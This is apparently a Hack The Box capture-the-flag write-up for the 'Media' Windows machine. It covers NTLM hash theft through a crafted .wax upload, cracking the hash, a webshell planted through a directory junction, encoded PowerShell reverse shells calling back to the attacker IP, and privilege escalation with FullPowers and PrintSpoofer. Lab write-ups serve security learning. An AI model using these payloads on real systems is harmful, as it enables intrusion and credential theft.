You can solve this lab here https://app.hackthebox.com/machines/Media

Network Enumeration

Target IP: 10.129.24.82 / 10.129.182.240 Attacker IP: 10.10.15.3

22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: ProMotion Studio
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-10T14:21:14+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: MEDIA
|   NetBIOS_Domain_Name: MEDIA
|   NetBIOS_Computer_Name: MEDIA
|   DNS_Domain_Name: MEDIA
|   DNS_Computer_Name: MEDIA
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-10T14:21:09+00:00
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2025-04-15T03:36:52
|_Not valid after:  2025-10-15T03:36:52
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On the bottom of the home page it looks like we are able to upload a type of file

I submit a PNG file and it is successful

Whatever file we upload should be compatible with Windows Media Player as stated on the website.

NTLM hijacking via .wax

Doing some research on the exploits available for Windows Media Player I come across this blog that showcases some ideas and I highly recommend you give this one a read: https://medium.com/@whickey000/creating-malicious-wms-files-malware-mondays-3-d4dbcb06a54f

We are going to use this tool to assist us in creating our payload: https://github.com/Greenwolf/ntlm_theft.git

We generate a payload with the python script.

python ntlm_theft.py --generate all --server 10.10.15.3 --filename video

The generated file we are going to focus on is video.wax

We are going to make a few edits to the file so that when we set up Responder, we are able to obtain the NTLM hash

We set up Responder and then upload our file.

sudo responder -I tun0

We get a hit back on Responder with our hash

We can use hashcat to obtain our password

hashcat hash /usr/share/wordlists/rockyou.txt.gz

1234virus@

We can SSH into our target device using the credentials we obtained

enox:1234virus@

Target machine enumeration

We set up a simple HTTP server on our attacking machine and transfer over winPEASx64.exe onto our target so we can further enumerate

python -m http.server

certutil -urlcache -f http://10.10.15.3:8000/winPEASx64.exe winPEASx64.exe

review.ps1 script

We find a file named review.ps1 in the Documents folder of user enox

function Get-Values {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Read the first line of the file
    $firstLine = Get-Content $FilePath -TotalCount 1

    # Extract the values from the first line
    if ($firstLine -match 'Filename: (.+), Random Variable: (.+)') {
        $filename = $Matches[1]
        $randomVariable = $Matches[2]

        # Create a custom object with the extracted values
        $repoValues = [PSCustomObject]@{
            FileName = $filename
            RandomVariable = $randomVariable
        }

        # Return the custom object
        return $repoValues
    }
    else {
        # Return $null if the pattern is not found
        return $null
    }
}

function UpdateTodo {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Create a .NET stream reader and writer
    $reader = [System.IO.StreamReader]::new($FilePath)
    $writer = [System.IO.StreamWriter]::new($FilePath + ".tmp")

    # Read the first line and ignore it
    $reader.ReadLine() | Out-Null

    # Copy the remaining lines to a temporary file
    while (-not $reader.EndOfStream) {
        $line = $reader.ReadLine()
        $writer.WriteLine($line)
    }

    # Close the reader and writer
    $reader.Close()
    $writer.Close()

    # Replace the original file with the temporary file
    Remove-Item $FilePath
    Rename-Item -Path ($FilePath + ".tmp") -NewName $FilePath
}

$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"


while($True){

    if ((Get-Content -Path $todofile) -eq $null) {
        Write-Host "Todo is empty."
        Sleep 60 # Sleep for 60 seconds before rechecking
    }
    else {
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable
        Write-Host "FileName: $filename"
        Write-Host "Random Variable: $randomVariable"

        # Opening the File in Windows Media Player
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"       

        # Wait for 15 seconds
        Start-Sleep -Seconds 15

        $mediaPlayerProcess = Get-Process -Name "wmplayer" -ErrorAction SilentlyContinue
        if ($mediaPlayerProcess -ne $null) {
            Write-Host "Killing Windows Media Player process."
            Stop-Process -Name "wmplayer" -Force
        }

        # Task Done
        UpdateTodo -FilePath $todofile # Updating C:\Windows\Tasks\Uploads\todo.txt
        Sleep 15
    }

}

This PowerShell script appears to be a file processing automation tool that monitors a todo list and automatically opens files in Windows Media Player. Here’s what it does: Core Functionality

Main Loop: The script runs continuously, checking a todo file every 60 seconds for new tasks to process.

File Management:

Monitors C:\Windows\Tasks\Uploads\todo.txt for entries Uses a Get-Values function to extract filename and directory information from the todo file Removes processed entries using an UpdateTodo function

Media Player Integration:

Automatically opens files in Windows Media Player using the extracted path: C:\Windows\Tasks\uploads$randomVariable$filename Waits 15 seconds, then forcefully terminates the media player process Takes another 15-second pause before checking for the next task

Critical Security Issues

Arbitrary File Execution: The script automatically executes any file path specified in the todo.txt file through Windows Media Player. This could allow an attacker who can write to the todo file to execute malicious media files or exploit Media Player vulnerabilities.

Privileged File Locations: Operating in C:\Windows\Tasks\ suggests the script runs with elevated privileges, which amplifies the impact of any security vulnerabilities.

No Input Validation: There’s no apparent validation of file paths or content in the todo file, making it vulnerable to:

Path traversal attacks (using ../ sequences) Execution of files from unexpected locations Processing of malicious or crafted media files

Uncontrolled File Access: The script will attempt to open any file specified in the todo list, regardless of file type, location, or safety.

Sym link abuse

We are going to upload a PHP webshell

In C:\Windows\Tasks\Uploads we see the new folder that is created with our webshell.php file

We remove the directory

rmdir eabb9a81b36d60b97e74bae4a56f5e96

Then we set up the symbolic link

cmd /c mklink /J C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96 C:\xampp\htdocs

Command Breakdown cmd /c: Executes the command in a new command prompt that closes after completion mklink /J: Creates a junction point (hard link for directories)

Source: C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96 Target: C:\xampp\htdocs

What This Does Creates a Bridge: The junction makes the XAMPP web server’s document root (C:\xampp\htdocs) accessible through the Windows Tasks directory using a hash-like folder name. Directory Aliasing: Any file accessed via C:\Windows\Tasks\Uploads\eabb9a81b36d60b97e74bae4a56f5e96\ will actually be reading from C:\xampp\htdocs\

Upload the web shell once more so we can now access it.

We can see that our symbolic link works, and webshell.php is now in the root directory of the web page.

We will upload a url & base64 encoded Powershell reverse shell and upload it to see if we get a response back.

Generate easy reverse shells here: https://www.revshells.com/

curl http://10.129.182.240/webshell.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMwAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA%2BACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA%2BACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA%3D

We get a response back.

We check the privileges that local service has enabled.

FullPowers

The LOCAL SERVICE account typically has these limited privileges by default:

SeChangeNotifyPrivilege (Bypass traverse checking) SeCreateGlobalPrivilege (Create global objects) SeImpersonatePrivilege (Impersonate a client after authentication) SeIncreaseQuotaPrivilege (Adjust memory quotas for a process)

Its possible to restore/add this privilege back to our local service account.

We are going to use fullpowers to accomplish this

https://github.com/itm4n/FullPowers/releases/tag/v0.1

We open up a new listener on port 4444 and set up a new session with base64 encoded powershell

.\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMwAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" -z

We are now in with full privileges as local service

With this now we can easily abuse SeImpersonatePrivilege to get SYSTEM level access.

SYSTEM access

We will use PrintSpoofer to exploit SeImpersonatePrivilege found here: https://github.com/itm4n/PrintSpoofer

Transfer it into our target machine and set up another listener that we will use to connect as System

We get a hit back on our listener and have SYSTEM access! pwned